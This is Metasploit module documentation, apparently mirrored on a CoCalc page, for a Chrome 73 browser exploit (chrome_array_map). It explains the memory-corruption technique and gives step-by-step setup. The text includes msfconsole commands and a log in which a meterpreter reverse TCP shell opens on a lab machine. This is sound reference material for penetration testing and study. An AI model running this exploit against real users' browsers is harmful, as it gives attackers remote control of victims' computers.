CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

This module exploits an issue in Chrome 73.0.3683.86 (64 bit). The exploit corrupts the length of a float in order to modify the backing store of a typed array. The typed array can then be used to read and write arbitrary memory. The exploit then uses WebAssembly in order to allocate a region of RWX memory, which is then replaced with the payload.

The payload is executed within the sandboxed renderer process, so the browser must be run with the --no-sandbox option for the payload to work correctly.

Vulnerable Application

The module is compatible with any 64bit Google Chrome (version 72 or 73), on any platform (macOS, Linux or Windows), however the code that writes the shellcode into the rwx region (wasm_rwx_addr) may need to be modified.

Vulnerable Application Installation Steps

You can download a vulnerable Chrome version from this location: https://www.filepuma.com/download/google_chrome_64bit_73.0.3683.86-21785/

You should ensure that application does not update itself to the latest version (by disabling automatic updates or simply not connecting to the internet). You may also need to disable Windows Defender.

Verification Steps

1. Do: use exploit/multi/browser/chrome_array_map

2. Do: set payload windows/x64/meterpreter/reverse_tcp

3. Do: set LHOST [IP]

4. Do: set SRVHOST [IP]

5. Do: set URIPATH / [PATH]

6. Do: run

Scenarios

Windows 10 and Google Chrome 73.0.3683.86 with --no-sandbox

Start Google Chrome without a sandbox: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --no-sandbox

msf5 > use exploit/multi/browser/chrome_array_map
msf5 exploit(multi/browser/chrome_array_map) > set SRVHOST 192.168.56.1
SRVHOST => 192.168.56.1
msf5 exploit(multi/browser/chrome_array_map) > set URIPATH /
URIPATH => /
msf5 exploit(multi/browser/chrome_array_map) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/browser/chrome_array_map) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf5 exploit(multi/browser/chrome_array_map) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf5 exploit(multi/browser/chrome_array_map) >
[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Using URL: http://192.168.56.1:8080/
[*] Server started.
[*] 192.168.56.3     chrome_array_map - Sending / to Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36
[*] Sending stage (206403 bytes) to 192.168.56.3
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.3:49675) at 2020-02-29 15:07:06 +0800

msf5 exploit(multi/browser/chrome_array_map) > sessions 1
[*] Starting interaction with 1...

meterpreter > pwd
C:\Program Files (x86)\Google\Chrome\Application\73.0.3683.86
meterpreter >